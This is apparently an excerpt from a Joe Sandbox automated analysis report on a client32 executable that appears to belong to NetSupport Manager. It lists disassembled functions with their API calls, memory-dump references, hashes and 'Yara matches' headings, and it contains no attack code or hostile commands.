                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                    • API String ID: 2755257978-4108050209
                                                                                                                                                                                                    • Opcode ID: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
                                                                                                                                                                                                    • Instruction ID: 151c37117e6a4efcf468b3f2afefe3ee8c103672a57a50470b6f5af14a9aa5dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A031A370D0121ABBEB01DFA4D889BEEBBFCEF46358F008159F951E6240E7759A44CB51
                                                                                                                                                                                                    Function 1100F2D0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F2FD
                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F320
                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 1100F3A4
                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1100F3B2
                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3C5
                                                                                                                                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F3DF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                                                                                    • String ID: bad cast$*r
                                                                                                                                                                                                    • API String ID: 2427920155-3873134974
                                                                                                                                                                                                    • Opcode ID: 801cc3ce022a6b056ddab743a2237e93a357ff3796620844a7456d523b295f49
                                                                                                                                                                                                    • Instruction ID: d39dcf25abbe8801d5c0a0784b2024497f923947b746a9a7221ebbb3b7ea5b8b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 801cc3ce022a6b056ddab743a2237e93a357ff3796620844a7456d523b295f49
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F31BF75D042659FDB55DF98C880BAEF7B4EB053B8F40826DD822A7290DB31B904DB92
                                                                                                                                                                                                    Function 1101D410 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1101D440
                                                                                                                                                                                                    • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D45A
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1101D46A
                                                                                                                                                                                                    • RegisterClassExA.USER32(?), ref: 1101D4AB
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11190240,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D4DE
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 1101D4EB
                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 1101D4F2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                                                                                                                                    • String ID: NSMChatSizeWnd
                                                                                                                                                                                                    • API String ID: 2883038198-4119039562
                                                                                                                                                                                                    • Opcode ID: 278526c9658a69e7a40e6cb25d6626fde906cf365c21d4dc24fc7d5a55472854
                                                                                                                                                                                                    • Instruction ID: dcbcbcf091995d4067a9012f4e3e9d0ed9d195d12c757acb72af4b7ecf5f03b9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 278526c9658a69e7a40e6cb25d6626fde906cf365c21d4dc24fc7d5a55472854
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D63180B5D0121DAFCB10DFA5DDC4AEEFBB8EB48318F20456EF925A3240D73569018B61
                                                                                                                                                                                                    Function 110094B0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _strncmp.LIBCMT ref: 110094EA
                                                                                                                                                                                                    • _strncmp.LIBCMT ref: 110094FA
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,24DE4E77), ref: 1100959B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • IsA(), xrefs: 11009555, 1100957D
                                                                                                                                                                                                    • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009521
                                                                                                                                                                                                    • https://, xrefs: 110094DF
                                                                                                                                                                                                    • http://, xrefs: 110094E5, 110094F8
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009550, 11009578
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _strncmp$FileWrite
                                                                                                                                                                                                    • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                                                                                                                                    • API String ID: 1635020204-3154135529
                                                                                                                                                                                                    • Opcode ID: 35d060acf12ccdd480c04a845a76d973b580c562fc5caea60c424b02d90a38e1
                                                                                                                                                                                                    • Instruction ID: d20e6e8e82cea177770e9d14c68faf5d1120bac870e30f80c07a18668992f196
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35d060acf12ccdd480c04a845a76d973b580c562fc5caea60c424b02d90a38e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71315C75E0065AABDB00DF95DC84FDEB7B8EF49658F004259E825A7280EB35A604CBA1
                                                                                                                                                                                                    Function 687F6A1D Relevance: 13.7, APIs: 9, Instructions: 226COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT(?,000000FF,00000024,?,?,687F6A18,?), ref: 687F6A3D
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 687F6A78
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 687F6B35
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 687F6B8E
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 687F6BAB
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 687F6BCE
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,687F6A18,?), ref: 68809D32
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,?,687F6A18,?), ref: 68809D3C
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,?,?,687F6A18,?), ref: 68809D56
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_errno$_invalid_parameter_noinfo_memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1299486453-0
                                                                                                                                                                                                    • Opcode ID: c745a1876d2c15af52cc1aae0b91f04d690f4a01e189362dc6cc83279d0754fb
                                                                                                                                                                                                    • Instruction ID: d956d6fa85e74892b3bdbbf10e9491fd08cf018a68a0a49861b44b700794ba3d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c745a1876d2c15af52cc1aae0b91f04d690f4a01e189362dc6cc83279d0754fb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92614775A40309EFD7049F6DCC44BAA77B6EF84328FA0853DFA219B2D2D7759A018B50
                                                                                                                                                                                                    Function 687F2ACE Relevance: 13.7, APIs: 9, Instructions: 165COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memcpy_s.MSVCR100(?,?,?,?), ref: 687F2B77
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 68808C29
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 68808C34
                                                                                                                                                                                                    • _memset.LIBCMT(?,00000000,?), ref: 68808C47
                                                                                                                                                                                                    • _fileno.MSVCR100(?,?,?), ref: 68808CA3
                                                                                                                                                                                                    • _read.MSVCR100(00000000,?,?), ref: 68808CAA
                                                                                                                                                                                                    • _memset.LIBCMT(?,00000000,000000FF), ref: 68808CD4
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 68808CDC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_memset$_fileno_invalid_parameter_noinfo_readmemcpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4008029522-0
                                                                                                                                                                                                    • Opcode ID: 9533a4b58b6482e30dfef67ed36a6f0b5c1fcf0c731f807410a20d3b90c6e9c1
                                                                                                                                                                                                    • Instruction ID: b3e8c769893623e4796cd9570f087f588df294a777f087470a7b5f92883f2077
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9533a4b58b6482e30dfef67ed36a6f0b5c1fcf0c731f807410a20d3b90c6e9c1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B51D630A51609DBDB108FAECE4469DB7B1AF45324F948A3AE834572D0D730D996CB72
                                                                                                                                                                                                    Function 1114F1D0 Relevance: 13.6, APIs: 9, Instructions: 128windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 1114F203
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 1114F219
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F2FF
                                                                                                                                                                                                    • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 1114F327
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1114F33B
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1114F361
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F371
                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 1114F378
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 1114F387
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 602542589-0
                                                                                                                                                                                                    • Opcode ID: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                                                                                                    • Instruction ID: f8b28bdea48ec2611b1f91f2bbafde9b68da4a4719e2569757cfb30afdba7c1c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7851DAF5E012299FDB60DF28CD8479DBBB9EF88604F5091EAE609E3240D7705A81CF59
                                                                                                                                                                                                    Function 1100D3B0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918F0), ref: 1100D3C4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918E0), ref: 1100D3D8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918D0), ref: 1100D3ED
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918C0), ref: 1100D401
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918B4), ref: 1100D415
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191894), ref: 1100D42A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191874), ref: 1100D43E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191864), ref: 1100D452
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191854), ref: 1100D467
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                                                                    • Opcode ID: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
                                                                                                                                                                                                    • Instruction ID: 9f027eddd4dddc581f186f25ec93b792fa700742cd5a4619bf017c7ec0e1ed24
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B31BBB59122349FE706DBE4C8D5A76B7E9E34C758F00857AE93083248D7F4A881CFA0
                                                                                                                                                                                                    Function 687EA90B Relevance: 13.6, APIs: 9, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _malloc_crt.MSVCR100(00000018,687EA948,0000000C,688074F7,00000001,00000001,?,687E1EE5,0000000D), ref: 687EA96F
                                                                                                                                                                                                    • _lock.MSVCR100(0000000A,687EA948,0000000C,688074F7,00000001,00000001,?,687E1EE5,0000000D), ref: 687EA981
                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,687EA948,0000000C,688074F7,00000001,00000001,?,687E1EE5,0000000D), ref: 687EA998
                                                                                                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 6880749F
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 688074A6
                                                                                                                                                                                                    • _errno.MSVCR100(687EA948,0000000C,688074F7,00000001,00000001,?,687E1EE5,0000000D), ref: 688074B9
                                                                                                                                                                                                    Memory Dump Source
